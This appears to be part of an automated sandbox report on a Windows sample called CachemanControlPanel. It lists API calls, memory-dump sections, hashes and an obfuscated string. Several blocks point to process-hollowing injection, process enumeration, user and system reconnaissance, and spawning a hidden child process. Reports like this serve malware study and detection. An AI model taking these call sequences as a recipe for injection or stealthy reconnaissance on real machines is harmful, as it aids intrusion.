                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$Context$AllocCreateResumeSectionUnmapViewVirtual
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3932078547-3176450862
                                                        • Opcode ID: 6cda5cc3daef51f03a1118b180d6b3c25dd1e520ed89062c43841e8820beb168
                                                        • Instruction ID: f72b3a053dca83f2f24490b4290ac8229286aacf070d2431c1197390f0c723e8
                                                        • Opcode Fuzzy Hash: 6cda5cc3daef51f03a1118b180d6b3c25dd1e520ed89062c43841e8820beb168
                                                        • Instruction Fuzzy Hash: A1613C71148349AFCB31EF50CC81BCFB3A9FF88304F40881EF69856191D775AA688B5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • wcsncpy.MSVCRT ref: 0040C866
                                                        • wcslen.MSVCRT ref: 0040C87A
                                                        • wcscat.MSVCRT ref: 0040C8A7
                                                        • GetDriveTypeW.KERNEL32(?), ref: 0040C8B3
                                                        • FindFirstFileW.KERNEL32(?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000), ref: 0040C8F6
                                                        • FindClose.KERNEL32(00000000), ref: 0040C920
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0040C95A
                                                        • GetDriveTypeW.KERNEL32(?), ref: 0040C96F
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040C8CB
                                                        • :, xrefs: 0040C890
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: DriveFileFindType$AttributesCloseFirstwcscatwcslenwcsncpy
                                                        • String ID: :$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 172296787-3083913587
                                                        • Opcode ID: 96641e49902afa07c7611e4a6f5972a09b498ab9555f039dc14ee386fb6e34f8
                                                        • Instruction ID: 3c0650f9738dc0c4728bf1713aaab36060c93e10baf55f61dc00705825c10516
                                                        • Opcode Fuzzy Hash: 96641e49902afa07c7611e4a6f5972a09b498ab9555f039dc14ee386fb6e34f8
                                                        • Instruction Fuzzy Hash: 4631C9B3545305D6C620EB649885E6B73A9AF81310F204F3BE191F31D0D778D985D75E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004039F1
                                                        • Process32FirstW.KERNEL32(?,?), ref: 00403A0C
                                                        • Process32NextW.KERNEL32(?,?), ref: 00403A22
                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 00403B3A
                                                          • Part of subcall function 0040A200: TlsGetValue.KERNEL32(?,?,0040819F,00000000,00000002,00000000,00000000,00000000,00000000,00404B56,00000000,00000000,00000001,00000001,00000006,00000000), ref: 0040A208
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                        • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00403A3E
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 004176E0: memcpy.MSVCRT ref: 00417717
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004039B7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorHeapLastProcess32$AllocateCloseCreateCurrentFirstFreeHandleNextProcessSnapshotToolhelp32memcpywcslen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 719671296-3176450862
                                                        • Opcode ID: 536ef4af239ac7718063b422224ffc1580f13f7942d88d2975f683eff2dec3e7
                                                        • Instruction ID: ed5b67eebec5cb5b443be5d127fb0a8b27c000d4536197cc3c446200d9639ccf
                                                        • Opcode Fuzzy Hash: 536ef4af239ac7718063b422224ffc1580f13f7942d88d2975f683eff2dec3e7
                                                        • Instruction Fuzzy Hash: 8E411FB65043447AD610BB729D86AFF77ADEBC4718F10882FB04496142EE3CDE85962E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000008,00000000,00000000), ref: 0040F39D
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,00000008,00000000,00000000), ref: 0040F3B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide
                                                        • String ID: b9sDdTlHgHHPc
                                                        • API String ID: 626452242-34561903
                                                        • Opcode ID: bc91d954c702cfd97358d2097a5e33c26f372d7827f954d7f3c24e36c96ae16f
                                                        • Instruction ID: a5bf63edb4100709863f0b6eb7c538e9ad8fe8534d816338255157c38cf5943e
                                                        • Opcode Fuzzy Hash: bc91d954c702cfd97358d2097a5e33c26f372d7827f954d7f3c24e36c96ae16f
                                                        • Instruction Fuzzy Hash: BD516A321083955AE731CE2988017EB7BD0ABA7314F14547EE9C9AB7C3C579890FC75A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • memset.MSVCRT ref: 0040C523
                                                        • GetSystemInfo.KERNEL32(0000000C,?,?,?,00000000,00000000,00433854,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000), ref: 0040C537
                                                        • GlobalMemoryStatusEx.KERNEL32(00000000), ref: 0040C54D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: GlobalInfoMemoryStatusSystemmemset
                                                        • String ID:
                                                        • API String ID: 3103902362-0
                                                        • Opcode ID: 0b2908797d24ed53770c9e15be3b2c2acf5413506e374d60448f601c0276bf88
                                                        • Instruction ID: 534d3538bbb9868ce28a38815dedbf90a5aaac1205c576e6224131a206a0edfe
                                                        • Opcode Fuzzy Hash: 0b2908797d24ed53770c9e15be3b2c2acf5413506e374d60448f601c0276bf88
                                                        • Instruction Fuzzy Hash: 3511E978E01128EBCB14DBD5DD84A9EB7B5FB48300F204762E905BB3C4D238FD069A89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 004188D0: TlsGetValue.KERNEL32(00000022,00001000,00000000,00000000), ref: 004188DC
                                                          • Part of subcall function 004188D0: RtlReAllocateHeap.NTDLL(02A80000,00000000,?,?), ref: 00418937
                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0040C5FE
                                                          • Part of subcall function 004189B0: TlsGetValue.KERNEL32(00000022,?,0043101C,0041779D,00000000,00000000,00000007,?,?,?,00401116,0043101C,FFFFFFFF,00000002,00000000,00000000), ref: 004189BA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$AllocateHeapNameUser
                                                        • String ID:
                                                        • API String ID: 2635446157-0
                                                        • Opcode ID: bf0dedebb5e64075ccdaa5853708b9240f9af3f5019348e202621cff274b4f62
                                                        • Instruction ID: 1d5e9e947f5f8d3bd63a7a5b9719a14f5b1e4b15b5a75373e830f134c4033555
                                                        • Opcode Fuzzy Hash: bf0dedebb5e64075ccdaa5853708b9240f9af3f5019348e202621cff274b4f62
                                                        • Instruction Fuzzy Hash: BAE092B1800118FBDB10ABA2CD09CEF7F2CEB04390F10056AB90462140DA399E1196AE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: <8C
                                                        • API String ID: 0-712665399
                                                        • Opcode ID: 6c4e5a90e962732a6225da3609039a7749263e3bffb7dbc5fafd9da71a1820ef
                                                        • Instruction ID: 0c683275490bcabb3b46bbabec03a7bf1525a8b7e7810facacdcbfe32042ada8
                                                        • Opcode Fuzzy Hash: 6c4e5a90e962732a6225da3609039a7749263e3bffb7dbc5fafd9da71a1820ef
                                                        • Instruction Fuzzy Hash: 5AF0B6B5949A07AFD3598F1AE580601FBE4BB88210B64862EA45C83B10E334E5A18F98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • memset.MSVCRT ref: 0040AC56
                                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00433880,02A88EB0,00430236,00000000,00000000,0043387C,installation,name,00000000), ref: 0040ACDE
                                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00433880,02A88EB0,00430236,00000000,00000000,0043387C,installation,name,00000000), ref: 0040AD33
                                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00433880,02A88EB0,00430236,00000000,00000000,0043387C,installation,name,00000000), ref: 0040AD79
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0040ADC3
                                                        • GetStdHandle.KERNEL32(000000F5), ref: 0040ADD7
                                                        • GetStdHandle.KERNEL32(000000F4), ref: 0040ADEB
                                                        • wcslen.MSVCRT ref: 0040AE17
                                                        • wcslen.MSVCRT ref: 0040AE25
                                                        • HeapAlloc.KERNEL32(00000000,00000000), ref: 0040AE3F
                                                        • wcscpy.MSVCRT ref: 0040AE57
                                                        • wcscat.MSVCRT ref: 0040AE5E
                                                        • wcscat.MSVCRT ref: 0040AE69
                                                        • wcscpy.MSVCRT ref: 0040AE75
                                                        • wcscat.MSVCRT ref: 0040AE90
                                                        • wcscat.MSVCRT ref: 0040AE9D
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 0040AED7
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AEF5
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AF01
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AF0D
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AF13
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 0040AF27
                                                        • EnterCriticalSection.KERNEL32(004341B8,?,00000000,?,?,?), ref: 0040AF39
                                                        • LeaveCriticalSection.KERNEL32(004341B8,?,00000000,?,?,?), ref: 0040AF50
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AF84
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AF9B
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AFA7
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AFB3
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AFBF
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AFCB
                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 0040AFD7
                                                        • wcslen.MSVCRT ref: 0040AFF1
                                                        • wcscpy.MSVCRT ref: 0040B017
                                                        • memset.MSVCRT ref: 0040B043
                                                        • ShellExecuteExW.SHELL32 ref: 0040B0A0
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0BF
                                                        • EnterCriticalSection.KERNEL32(004341B8), ref: 0040B0D1
                                                        • LeaveCriticalSection.KERNEL32(004341B8), ref: 0040B0E8
                                                          • Part of subcall function 0040ABB4: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,0040AD9C,?), ref: 0040ABC3
                                                          • Part of subcall function 0040ABB4: GetCurrentProcess.KERNEL32(?,00000000,?,?,0040AD9C,?), ref: 0040ABCF
                                                          • Part of subcall function 0040ABB4: DuplicateHandle.KERNEL32(00000000,?,?,0040AD9C,?), ref: 0040ABD6
                                                          • Part of subcall function 0040ABB4: CloseHandle.KERNEL32(?,?,?,0040AD9C,?), ref: 0040ABE2
                                                        • HeapFree.KERNEL32(00000000,?), ref: 0040B124
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040AC13
                                                        • x, xrefs: 0040AFD9
                                                        • `Pxt Fw Uxt, xrefs: 0040ADB2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY$`Pxt Fw Uxt$x
                                                        • API String ID: 550696126-3931963186
                                                        • Opcode ID: f665636fc65fa11609da4e3299dcfe9842a0f89316d981efb886f48c125c998c
                                                        • Instruction ID: 05a40b855c393bc71a8864245f9e2202cf2a3e9f3a0ef0d98c01c47f486452e6
                                                        • Opcode Fuzzy Hash: f665636fc65fa11609da4e3299dcfe9842a0f89316d981efb886f48c125c998c
                                                        • Instruction Fuzzy Hash: 4FE17A715083419FD321DF24C845BABBBE4FF88354F144A3FF599A2290EB788954CB9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420BC0
                                                          • Part of subcall function 004216BC: _atan2f.LIBCMT ref: 004216D5
                                                          • Part of subcall function 004216BC: SelectObject.GDI32(?,?), ref: 00421702
                                                        • wcslen.MSVCRT ref: 00420BFA
                                                        • GetTextExtentPoint32W.GDI32(00000000,?,00000000,?), ref: 00420C03
                                                        • _logf.LIBCMT ref: 00420C42
                                                          • Part of subcall function 004217BC: sin.MSVCRT ref: 004217C7
                                                        • _logf.LIBCMT ref: 00420C52
                                                          • Part of subcall function 0042177F: cos.MSVCRT ref: 0042178A
                                                        • _logf.LIBCMT ref: 00420C98
                                                        • _logf.LIBCMT ref: 00420CB1
                                                        • memset.MSVCRT ref: 00420D8C
                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00420DCA
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00420DDC
                                                        • SetBkMode.GDI32(?,00000002), ref: 00420DF1
                                                        • SetTextAlign.GDI32(?,00000000), ref: 00420E06
                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00420E0F
                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00420E1B
                                                        • GetStockObject.GDI32(00000004), ref: 00420E35
                                                        • FillRect.USER32(00000000,00000000,00000000), ref: 00420E42
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00420E50
                                                        • wcslen.MSVCRT ref: 00420E62
                                                        • TextOutW.GDI32(00000000,?,?,?,00000000), ref: 00420E7F
                                                        • DeleteDC.GDI32(00000000), ref: 00420ECD
                                                        • DeleteObject.GDI32(00000000), ref: 00420ED8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
